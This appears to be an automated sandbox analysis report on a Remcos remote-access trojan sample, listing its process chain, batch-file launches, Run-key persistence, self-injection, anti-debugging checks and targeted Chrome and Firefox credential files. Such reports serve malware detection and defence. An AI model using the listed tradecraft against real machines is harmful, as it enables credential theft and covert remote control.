              Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/9@96/5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040E39F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00409973 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004097FD FindResourceA,LoadResource,LockResource,SizeofResource,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
              Source: C:\Users\user\Desktop\V8IB839cvz.exeMutant created: \Sessions\1\BaseNamedObjects\daxvxdsaxzcas-LAPFBZ
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Software\
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: ProductName
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Remcos
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: licence
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Administrator
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: User
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: [Info]
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: V8IB839cvz.exeReversingLabs: Detection: 41%
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Users\user\Desktop\V8IB839cvz.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\V8IB839cvz.exe 'C:\Users\user\Desktop\V8IB839cvz.exe'
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
              Source: unknownProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeUnpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218442 push 00406044h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218442 push 00406044h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218444 push 00406044h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218444 push 00406044h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00403E7D ShellExecuteW,URLDownloadToFileW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile created: C:\Users\Public\Xypgtv\Xypgtv.exeJump to dropped file
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XypgtvJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XypgtvJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00409834 Sleep,ExitProcess,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004041E6 FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043C2E9 FindFirstFileExA,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00434340 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043D5BD GetProcessHeap,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004292B1 SetUnhandledExceptionFilter,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004294DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00430AB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeMemory written: C:\Users\user\Desktop\V8IB839cvz.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeMemory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeMemory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040F733 StrToIntA,mouse_event,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00410E32 cpuid
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00438112 GetSystemTimeAsFileTime,
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00410C6E CreateThread,GetComputerNameExW,GetUserNameW,
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Contains functionality to steal Chrome passwords or cookiesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \key3.db

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: cmd.exe

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Windows Service1Access Token Manipulation1Scripting1Credentials In Files2Account Discovery1Remote Desktop ProtocolClipboard Data2Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter12Registry Run Keys / Startup Folder1Windows Service1Obfuscated Files or Information2Security Account ManagerSystem Service Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Logon Script (Mac)Process Injection112Software Packing1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Masquerading1LSA SecretsSystem Information Discovery33SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
